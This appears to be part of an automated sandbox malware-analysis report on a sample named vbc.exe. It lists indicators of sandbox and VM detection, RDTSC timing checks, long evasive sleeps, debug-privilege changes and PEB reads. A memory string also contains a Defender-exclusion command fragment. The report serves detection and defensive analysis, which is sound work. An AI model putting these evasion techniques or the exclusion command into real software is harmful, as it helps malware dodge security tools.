Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\help.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Yara detected AntiVM3
Source: Yara match File source: 0.2.vbc.exe.2aec108.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.264277671.0000000002AA1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: vbc.exe PID: 6420, type: MEMORYSTR
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: vbc.exe, 00000000.00000002.264277671.0000000002AA1000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
Source: vbc.exe, 00000000.00000002.264277671.0000000002AA1000.00000004.00000001.sdmp Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\vbc.exe RDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\vbc.exe RDTSC instruction interceptor: First address: 000000000040899E second address: 00000000004089A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\help.exe RDTSC instruction interceptor: First address: 0000000002B48604 second address: 0000000002B4860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\help.exe RDTSC instruction interceptor: First address: 0000000002B4899E second address: 0000000002B489A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\vbc.exe TID: 6424 Thread sleep time: -38500s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe TID: 6464 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6808 Thread sleep time: -7378697629483816s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\help.exe TID: 6612 Thread sleep time: -40000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\help.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\help.exe Last function: Thread delayed
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_004088D0 rdtsc 8_2_004088D0
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\vbc.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5311 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3100 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Thread delayed: delay time: 38500 Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: vbc.exe, 00000000.00000002.264277671.0000000002AA1000.00000004.00000001.sdmp Binary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
Source: explorer.exe, 0000000B.00000000.276178140.0000000008A32000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00dRom0
Source: explorer.exe, 0000000B.00000000.276178140.0000000008A32000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: vbc.exe, 00000000.00000002.264277671.0000000002AA1000.00000004.00000001.sdmp Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 0000000B.00000000.310303787.0000000008B4E000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: vbc.exe, 00000000.00000002.264277671.0000000002AA1000.00000004.00000001.sdmp Binary or memory string: vmware
Source: explorer.exe, 0000000B.00000000.277498776.0000000008CEA000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}froQQ
Source: explorer.exe, 0000000B.00000000.310303787.0000000008B4E000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}e
Source: explorer.exe, 0000000B.00000000.303948954.00000000048E0000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000B.00000000.311106816.0000000008C73000.00000004.00000001.sdmp Binary or memory string: _VMware_SATA_CD00#5&
Source: explorer.exe, 0000000B.00000000.310145026.0000000008ACF000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000Datc
Source: explorer.exe, 0000000B.00000000.310303787.0000000008B4E000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}C
Source: explorer.exe, 0000000B.00000000.310145026.0000000008ACF000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 0000000B.00000000.292121937.00000000069DA000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD002
Source: explorer.exe, 0000000B.00000000.280486172.000000000ECF7000.00000004.00000001.sdmp Binary or memory string: 00000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}LL
Source: vbc.exe, 00000000.00000002.264277671.0000000002AA1000.00000004.00000001.sdmp Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools

Anti Debugging:

barindex
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_004088D0 rdtsc 8_2_004088D0
Enables debug privileges
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\help.exe Process token adjusted: Debug Jump to behavior
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_0181C182 mov eax, dword ptr fs:[00000030h] 8_2_0181C182
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_0182A185 mov eax, dword ptr fs:[00000030h] 8_2_0182A185
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_017FB171 mov eax, dword ptr fs:[00000030h] 8_2_017FB171
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_017FB171 mov eax, dword ptr fs:[00000030h] 8_2_017FB171
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_0182FD9B mov eax, dword ptr fs:[00000030h] 8_2_0182FD9B
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_0182FD9B mov eax, dword ptr fs:[00000030h] 8_2_0182FD9B
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_018235A1 mov eax, dword ptr fs:[00000030h] 8_2_018235A1
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_017FAD30 mov eax, dword ptr fs:[00000030h] 8_2_017FAD30
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_018A8DF1 mov eax, dword ptr fs:[00000030h] 8_2_018A8DF1
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_017F9100 mov eax, dword ptr fs:[00000030h] 8_2_017F9100
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_017F9100 mov eax, dword ptr fs:[00000030h] 8_2_017F9100
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_017F9100 mov eax, dword ptr fs:[00000030h] 8_2_017F9100
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_017FB1E1 mov eax, dword ptr fs:[00000030h] 8_2_017FB1E1
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_017FB1E1 mov eax, dword ptr fs:[00000030h] 8_2_017FB1E1
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_017FB1E1 mov eax, dword ptr fs:[00000030h] 8_2_017FB1E1
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_01814120 mov eax, dword ptr fs:[00000030h] 8_2_01814120
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_01814120 mov eax, dword ptr fs:[00000030h] 8_2_01814120
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_01814120 mov eax, dword ptr fs:[00000030h] 8_2_01814120
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_01814120 mov eax, dword ptr fs:[00000030h] 8_2_01814120
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_01814120 mov ecx, dword ptr fs:[00000030h] 8_2_01814120
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_01803D34 mov eax, dword ptr fs:[00000030h] 8_2_01803D34
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_01803D34 mov eax, dword ptr fs:[00000030h] 8_2_01803D34
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_01803D34 mov eax, dword ptr fs:[00000030h] 8_2_01803D34
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_01803D34 mov eax, dword ptr fs:[00000030h] 8_2_01803D34
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_01803D34 mov eax, dword ptr fs:[00000030h] 8_2_01803D34
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_01803D34 mov eax, dword ptr fs:[00000030h] 8_2_01803D34
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_01803D34 mov eax, dword ptr fs:[00000030h] 8_2_01803D34
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_01803D34 mov eax, dword ptr fs:[00000030h] 8_2_01803D34
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_01803D34 mov eax, dword ptr fs:[00000030h] 8_2_01803D34
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_01803D34 mov eax, dword ptr fs:[00000030h] 8_2_01803D34
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_01803D34 mov eax, dword ptr fs:[00000030h] 8_2_01803D34
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_01803D34 mov eax, dword ptr fs:[00000030h] 8_2_01803D34
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_01803D34 mov eax, dword ptr fs:[00000030h] 8_2_01803D34
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_018C8D34 mov eax, dword ptr fs:[00000030h] 8_2_018C8D34
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_0182513A mov eax, dword ptr fs:[00000030h] 8_2_0182513A
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_0182513A mov eax, dword ptr fs:[00000030h] 8_2_0182513A
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_01824D3B mov eax, dword ptr fs:[00000030h] 8_2_01824D3B
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_01824D3B mov eax, dword ptr fs:[00000030h] 8_2_01824D3B
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_01824D3B mov eax, dword ptr fs:[00000030h] 8_2_01824D3B
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_01833D43 mov eax, dword ptr fs:[00000030h] 8_2_01833D43
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_0181B944 mov eax, dword ptr fs:[00000030h] 8_2_0181B944
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_0181B944 mov eax, dword ptr fs:[00000030h] 8_2_0181B944
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_01873540 mov eax, dword ptr fs:[00000030h] 8_2_01873540
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_01817D50 mov eax, dword ptr fs:[00000030h] 8_2_01817D50
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_017F2D8A mov eax, dword ptr fs:[00000030h] 8_2_017F2D8A
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_017F2D8A mov eax, dword ptr fs:[00000030h] 8_2_017F2D8A
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_017F2D8A mov eax, dword ptr fs:[00000030h] 8_2_017F2D8A
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_017F2D8A mov eax, dword ptr fs:[00000030h] 8_2_017F2D8A
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_017F2D8A mov eax, dword ptr fs:[00000030h] 8_2_017F2D8A
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_0181C577 mov eax, dword ptr fs:[00000030h] 8_2_0181C577
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_0181C577 mov eax, dword ptr fs:[00000030h] 8_2_0181C577
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_01873884 mov eax, dword ptr fs:[00000030h] 8_2_01873884
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_01873884 mov eax, dword ptr fs:[00000030h] 8_2_01873884
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_018390AF mov eax, dword ptr fs:[00000030h] 8_2_018390AF
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_0182F0BF mov ecx, dword ptr fs:[00000030h] 8_2_0182F0BF
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_0182F0BF mov eax, dword ptr fs:[00000030h] 8_2_0182F0BF
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_0182F0BF mov eax, dword ptr fs:[00000030h] 8_2_0182F0BF
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_0188B8D0 mov eax, dword ptr fs:[00000030h] 8_2_0188B8D0
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_0188B8D0 mov ecx, dword ptr fs:[00000030h] 8_2_0188B8D0
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_0188B8D0 mov eax, dword ptr fs:[00000030h] 8_2_0188B8D0
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_0188B8D0 mov eax, dword ptr fs:[00000030h] 8_2_0188B8D0
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_0188B8D0 mov eax, dword ptr fs:[00000030h] 8_2_0188B8D0
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_0188B8D0 mov eax, dword ptr fs:[00000030h] 8_2_0188B8D0
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_018C8CD6 mov eax, dword ptr fs:[00000030h] 8_2_018C8CD6
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_018B14FB mov eax, dword ptr fs:[00000030h] 8_2_018B14FB
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_018C740D mov eax, dword ptr fs:[00000030h] 8_2_018C740D
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_018C740D mov eax, dword ptr fs:[00000030h] 8_2_018C740D
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_018C740D mov eax, dword ptr fs:[00000030h] 8_2_018C740D
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_018B1C06 mov eax, dword ptr fs:[00000030h] 8_2_018B1C06
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_018B1C06 mov eax, dword ptr fs:[00000030h] 8_2_018B1C06
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_018B1C06 mov eax, dword ptr fs:[00000030h] 8_2_018B1C06
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_018B1C06 mov eax, dword ptr fs:[00000030h] 8_2_018B1C06
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_018B1C06 mov eax, dword ptr fs:[00000030h] 8_2_018B1C06
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_018B1C06 mov eax, dword ptr fs:[00000030h] 8_2_018B1C06
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_018B1C06 mov eax, dword ptr fs:[00000030h] 8_2_018B1C06
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_018B1C06 mov eax, dword ptr fs:[00000030h] 8_2_018B1C06
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_018B1C06 mov eax, dword ptr fs:[00000030h] 8_2_018B1C06
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_018B1C06 mov eax, dword ptr fs:[00000030h] 8_2_018B1C06
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_018B1C06 mov eax, dword ptr fs:[00000030h] 8_2_018B1C06
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_018B1C06 mov eax, dword ptr fs:[00000030h] 8_2_018B1C06
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_018B1C06 mov eax, dword ptr fs:[00000030h] 8_2_018B1C06
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_018B1C06 mov eax, dword ptr fs:[00000030h] 8_2_018B1C06
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_01877016 mov eax, dword ptr fs:[00000030h] 8_2_01877016
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_01877016 mov eax, dword ptr fs:[00000030h] 8_2_01877016
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_01877016 mov eax, dword ptr fs:[00000030h] 8_2_01877016
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_018C4015 mov eax, dword ptr fs:[00000030h] 8_2_018C4015
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_018C4015 mov eax, dword ptr fs:[00000030h] 8_2_018C4015
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_0180B02A mov eax, dword ptr fs:[00000030h] 8_2_0180B02A
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_0180B02A mov eax, dword ptr fs:[00000030h] 8_2_0180B02A
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_0180B02A mov eax, dword ptr fs:[00000030h] 8_2_0180B02A
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_0180B02A mov eax, dword ptr fs:[00000030h] 8_2_0180B02A
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_0182BC2C mov eax, dword ptr fs:[00000030h] 8_2_0182BC2C
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_0188C450 mov eax, dword ptr fs:[00000030h] 8_2_0188C450
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_0188C450 mov eax, dword ptr fs:[00000030h] 8_2_0188C450
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_0181746D mov eax, dword ptr fs:[00000030h] 8_2_0181746D
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_018B2073 mov eax, dword ptr fs:[00000030h] 8_2_018B2073
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_018C1074 mov eax, dword ptr fs:[00000030h] 8_2_018C1074
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_017F9080 mov eax, dword ptr fs:[00000030h] 8_2_017F9080
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_018B138A mov eax, dword ptr fs:[00000030h] 8_2_018B138A
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_01801B8F mov eax, dword ptr fs:[00000030h] 8_2_01801B8F
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_01801B8F mov eax, dword ptr fs:[00000030h] 8_2_01801B8F
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_017FDB60 mov ecx, dword ptr fs:[00000030h] 8_2_017FDB60
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_017FF358 mov eax, dword ptr fs:[00000030h] 8_2_017FF358
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_018C5BA5 mov eax, dword ptr fs:[00000030h] 8_2_018C5BA5
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_017FDB40 mov eax, dword ptr fs:[00000030h] 8_2_017FDB40
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_017F4F2E mov eax, dword ptr fs:[00000030h] 8_2_017F4F2E
